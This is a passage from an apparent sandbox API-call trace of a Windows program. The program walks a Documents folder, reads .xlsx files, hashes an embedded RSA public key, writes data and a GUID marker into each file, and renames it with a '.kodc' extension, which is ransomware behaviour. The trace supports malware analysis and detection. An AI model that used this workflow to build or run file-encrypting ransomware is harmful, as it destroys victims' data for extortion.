returned 0x0 [0098.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.813] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x94f0) returned 0x9ba4d90 [0098.814] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d690 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d6d8 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.814] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abf8 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331abe0 [0098.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.815] GetCurrentThreadId () returned 0x42c [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f868 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.815] GetCurrentThreadId () returned 0x42c [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac10 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.817] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x94eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.817] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.818] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.818] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.818] CloseHandle (hObject=0x5cc) returned 1 [0098.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WCZ6DRA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wcz6dra.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WCZ6DRA.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wcz6dra.xlsx.kodc")) returned 1 [0098.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.821] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.822] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f322880, ftCreationTime.dwHighDateTime=0x1d55cde, ftLastAccessTime.dwLowDateTime=0x8a883ff0, ftLastAccessTime.dwHighDateTime=0x1d5c1c9, ftLastWriteTime.dwLowDateTime=0x8a883ff0, ftLastWriteTime.dwHighDateTime=0x1d5c1c9, nFileSizeHigh=0x0, nFileSizeLow=0xde40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmeGhCG57Q.xlsx", cAlternateFileName="WMEGHC~1.XLS")) returned 1 [0098.822] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WmeGhCG57Q.xlsx") returned=".xlsx" [0098.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WmeGhCG57Q.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wmeghcg57q.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.822] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=56896) returned 1 [0098.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.825] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.825] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.826] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.826] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xde40, lpOverlapped=0x0) returned 1 [0098.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.827] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.828] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.828] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.828] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.828] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.828] GetLastError () returned 0x0 [0098.828] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.828] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.828] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.828] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.828] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xde40) returned 0x9ba4d90 [0098.829] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d6d8 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d720 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abf8 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac10 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.829] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ac10 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331abf8 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac10 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abf8 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.830] GetCurrentThreadId () returned 0x42c [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f8f8 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.830] 